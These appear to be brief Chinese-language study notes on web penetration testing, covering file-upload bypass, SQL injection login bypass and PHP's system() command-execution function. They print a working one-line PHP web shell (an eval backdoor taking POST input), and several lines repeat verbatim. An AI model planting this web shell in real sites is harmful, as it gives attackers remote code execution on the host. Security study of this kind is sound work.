2024年9月
文件上传upload
1.前端验证,比较简单不记了
一句话木马(搜了很多次了懒得记)
<?php @eval($_POST['attack']);?>
sql注入万能账号密码
常见的系统命令执行函数(php)
1、system() :
system — 执行外部程序(命令行),并且显示输出
这个函数会将结果直接进行输出 (注意:是直接输出区别于返回值,因为这个,我一般不用它),命令成功后返回输出的最后一行,失败返回FALSE
1.前端验证,比较简单不记了
<?php @eval($_POST['attack']);?>
1、system() :
system — 执行外部程序(命令行),并且显示输出
这个函数会将结果直接进行输出 (注意:是直接输出区别于返回值,因为这个,我一般不用它),命令成功后返回输出的最后一行,失败返回FALSE